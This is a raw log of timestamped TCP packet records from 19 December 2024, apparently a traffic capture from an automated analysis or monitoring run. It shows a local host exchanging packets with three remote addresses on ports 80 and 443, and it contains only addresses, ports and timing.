Dec 19, 2024 08:19:33.493045092 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.494297981 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.494378090 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.498054028 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.498116016 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.499713898 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.499783039 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.503366947 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.503524065 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.504704952 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.504782915 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.508496046 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.508596897 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.508608103 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.508687019 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.513618946 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.513711929 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.513719082 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.513811111 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.518826008 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.518893003 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.518939018 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.519087076 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.523906946 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.524884939 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.524936914 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.525172949 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.528997898 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.529071093 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.529076099 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.529125929 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.534151077 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.534235001 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.534240961 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.534388065 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.539061069 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.539124012 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.539153099 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.539330006 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.544136047 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.544234037 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.544302940 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.544457912 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.549268961 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.549346924 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.549354076 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.549437046 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.554004908 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.554068089 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.554125071 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.554193020 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.559107065 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.559196949 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.559204102 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.559268951 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.563822985 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.563924074 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.563930035 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.564208984 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.568434000 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.568511009 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.568516970 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.568583965 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.573277950 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.573333979 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.573376894 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.573455095 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.577872992 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.577924967 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.577930927 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.578023911 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.582516909 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.582612991 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.582631111 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.582710028 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.587543011 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.587626934 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.587631941 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.587970972 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.591820002 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.591886044 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.591964006 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.592020035 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.597069979 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.597138882 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.597177982 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.597243071 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.600944042 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.600994110 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.601074934 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.601135969 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.606288910 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.606389999 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.606395006 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.606483936 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.609961987 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.610162973 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.610301018 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.610436916 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.623611927 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.623675108 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.623755932 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.623863935 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.624789000 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.624859095 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.624881983 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.624927044 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.624933004 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.625020981 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.626820087 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.626868010 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.628663063 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.628906965 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.629050016 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.629134893 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.629139900 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.629188061 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.632456064 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.632601023 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.632685900 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.632858992 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.635965109 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.636030912 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.636035919 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.636172056 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.641088963 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.641165018 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.641170979 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.641367912 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.644337893 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.644416094 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.644421101 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.644534111 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.648186922 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.648308039 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.648313046 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.648365021 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.652354002 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.652393103 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.652405024 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.652467966 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.656038046 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.656168938 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.656173944 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.656379938 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.660017014 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.660093069 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.660176992 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.660238028 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.663752079 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.663800001 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.663811922 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.664012909 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.667418957 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.667493105 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.667500019 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.667561054 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.671199083 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.671279907 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.671355009 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.671405077 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.674832106 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.674983025 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.674988031 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.675097942 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.678710938 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.678759098 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.678783894 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.678858042 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.682192087 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.682275057 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.682280064 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.682390928 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.685408115 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.685477018 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.685483932 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.685551882 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.688704014 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.688831091 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.688836098 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.688900948 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.691828966 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.691879034 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.691940069 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.692034960 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.695202112 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.695271969 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.695290089 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.695334911 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.698348999 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.698431969 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.698523045 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.698786974 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.701306105 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.701380968 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.701385975 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.701531887 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.704329014 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.704402924 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.704454899 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.704520941 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.707412958 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.707489967 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.707495928 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.707576990 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.707930088 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.707982063 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.710351944 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.710695982 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.710860014 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.710958004 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.713387966 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.713438988 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.713876963 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.713978052 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.716478109 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.716557026 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.716907024 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.716974020 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.721101046 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.721154928 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.721589088 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.721656084 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.726278067 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.726430893 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.726763010 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.726814032 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.726862907 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.726913929 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.727871895 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.727951050 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.736505032 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.736599922 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.736607075 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.736766100 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.736887932 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.736943007 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.736943960 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.737040997 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.737966061 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.737982035 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:34.198416948 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:34.318000078 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:34.318949938 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:34.319214106 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:34.438812971 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:35.413820028 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:35.417264938 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:35.536636114 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:35.736304045 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:35.844427109 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:36.197532892 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:36.197587013 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:36.197658062 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:36.199448109 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:36.199474096 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:37.416681051 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:37.416903019 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:37.420191050 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:37.420202971 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:37.420531988 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:37.423765898 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:37.471340895 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:37.887516975 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:37.887592077 CET	443	49825	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:37.887650967 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:37.892568111 CET	49825	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:37.904212952 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:38.023718119 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:38.225465059 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:38.227888107 CET	49831	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:38.227931023 CET	443	49831	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:38.228023052 CET	49831	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:38.228303909 CET	49831	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:38.228318930 CET	443	49831	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:38.266330957 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:39.689331055 CET	443	49831	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:39.691061974 CET	49831	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:39.691092968 CET	443	49831	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:40.133627892 CET	443	49831	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:40.133699894 CET	443	49831	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:40.133754969 CET	49831	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:40.134223938 CET	49831	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:40.138405085 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:40.139338017 CET	49837	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:40.258472919 CET	80	49820	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:40.258677006 CET	49820	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:40.259000063 CET	80	49837	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:40.259229898 CET	49837	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:40.259380102 CET	49837	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:40.378783941 CET	80	49837	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:41.356376886 CET	80	49837	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:41.357470989 CET	49843	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:41.357530117 CET	443	49843	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:41.357597113 CET	49843	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:41.357826948 CET	49843	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:41.357846975 CET	443	49843	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:41.407146931 CET	49837	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:42.567262888 CET	443	49843	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:42.568984985 CET	49843	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:42.569020987 CET	443	49843	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:43.022712946 CET	443	49843	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:43.022780895 CET	443	49843	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:43.022833109 CET	49843	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:43.023241997 CET	49843	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:43.026606083 CET	49837	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:43.027626038 CET	49845	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:43.146703959 CET	80	49837	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:43.146792889 CET	49837	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:43.147089005 CET	80	49845	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:43.147178888 CET	49845	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:43.147336006 CET	49845	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:43.266820908 CET	80	49845	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:44.242521048 CET	80	49845	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:44.244512081 CET	49850	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:44.244568110 CET	443	49850	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:44.244626999 CET	49850	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:44.245054960 CET	49850	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:44.245073080 CET	443	49850	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:44.297580957 CET	49845	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:45.455785036 CET	443	49850	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:45.462495089 CET	49850	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:45.462555885 CET	443	49850	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:45.902434111 CET	443	49850	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:45.902503967 CET	443	49850	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:45.902573109 CET	49850	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:45.902992964 CET	49850	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:45.910096884 CET	49856	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:46.029557943 CET	80	49856	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:46.029697895 CET	49856	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:46.029876947 CET	49856	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:46.149344921 CET	80	49856	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:47.126243114 CET	80	49856	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:47.127561092 CET	49857	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:47.127643108 CET	443	49857	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:47.127794027 CET	49857	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:47.127937078 CET	49857	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:47.127966881 CET	443	49857	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:47.172702074 CET	49856	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:48.338716984 CET	443	49857	172.67.177.134	192.168.2.4
